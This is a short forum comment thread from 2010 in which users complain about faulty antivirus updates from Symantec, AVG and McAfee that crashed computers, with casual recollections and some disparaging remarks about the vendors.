http://texyt.com/symantec+china+compensates+antivirus+victims+angry...

Symantec also cause hundreds of PC in my company to crash with blue screen in year 2008 when one of its live update virus definition is corrupted.


Symantec and McAfee outsource their programming to cheap labour in India. When you pay peanuts, you get monkeys. If you expect quality, look elsewhere ;)

Edited 2010-04-24 08:48 UTC

Reply Score: 1

AVG is having a laugh right about now
by bousozoku on Sat 24th Apr 2010 15:27 UTC
bousozoku
Member since:
2006-01-23

Remember AVG Anti-Virus attacking a Windows (Vista?) system file and so many people were upset?

I can't imagine that McAfee are feeling any better, though they don't have a huge number of free users, though they have those free trials.

Reply Score: 2

hollovoid Member since:
2005-09-21

Actually home users were spared from the beating, it hit corporate customers and was caught before everybody else got hit. Which in some ways is kind of worse, because there is a much bigger sting to a whole company's worth of computers going down, than a bunch of random home computers.

Reply Score: 2

darknexus Member since:
2008-07-15

Didn't AVG also only hit one language of Windows? I think it was the German version wasn't it? And I don't believe AVG brought down any vital systems in German-speaking locales either, though this is probably because most corporate users don't use AVG of any kind.
Norton and McAfee, the real viruses. Those two most common have to be the worst virus protection in existence.

Reply Score: 2

hollovoid Member since:
2005-09-21

Norton and McAfee, the real viruses. Those two most common have to be the worst virus protection in existence.

This is very goddamn true.

Reply Score: 2